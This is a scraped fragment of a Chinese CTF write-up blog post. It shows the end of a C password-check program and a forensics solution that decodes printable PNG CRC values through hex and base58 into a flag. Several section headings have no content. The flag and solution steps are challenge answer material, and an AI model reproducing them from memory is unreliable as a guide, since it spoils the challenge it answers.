- puts("Wrong password!");
- return 1;
- }
- }
- else
- {
- printf("Usage: %s
\n" , *argv); - return 1;
- }
- }
直接比较就不说啥了,居然正确
-
-
-
Forensic
-
yhparg
-
docx
-
password
- 给出一个图片,010打开发现CRC错,错的CRC正好都是可显示字符
- *ERROR: CRC Mismatch @ chunk[2]; in data: 34706869; expected: 608c6056
- *ERROR: CRC Mismatch @ chunk[3]; in data: 4b624a4d; expected: fd917212
- *ERROR: CRC Mismatch @ chunk[4]; in data: 4d326176; expected: 1887ceca
- *ERROR: CRC Mismatch @ chunk[5]; in data: 52676b31; expected: d3be40b9
- *ERROR: CRC Mismatch @ chunk[6]; in data: 59763645; expected: 2828dec9
- *ERROR: CRC Mismatch @ chunk[7]; in data: 71594d70; expected: f3bac867
- *ERROR: CRC Mismatch @ chunk[8]; in data: 3143636e; expected: 368fbf8b
- *ERROR: CRC Mismatch @ chunk[9]; in data: 4e696265; expected: 07df8db0
- *ERROR: CRC Mismatch @ chunk[10]; in data: 56756345; expected: 54c5867d
- *ERROR: CRC Mismatch @ chunk[11]; in data: 59696d7a; expected: 9078d2bd
结果再base58
- >>> bytes.fromhex('347068694b624a4d4d32617652676b315976364571594d703143636e4e6962655675634559696d7a')
- b'4phiKbJMM2avRgk1Yv6EqYMp1CcnNibeVucEYimz'
- #T3N4CI0US{Is_escape_V4ry_Fun}
- 给出一个图片,010打开发现CRC错,错的CRC正好都是可显示字符
-
key
- 附件需要从谷歌网盘下。
-
-
-
相关阅读:
python中Thread实现多线程任务
微服务实战微服务网关Zuul入门与实战
ARM 37 个通用寄存器详解
远程桌面穿透SakuraFrp使用
【allegro 17.4软件操作保姆级教程九】布线后检查与调整
引擎入门 | Unity UI简介–第2部分(1)
基于AVR128单片机抢答器控制系统
JavaScript知识点复习--思维导图(全)
JAVAEE—HTTP
产业集群的转型升级需要各个方面的协同转型——以河北吉力宝为例
- 原文地址:https://blog.csdn.net/weixin_52640415/article/details/126303732
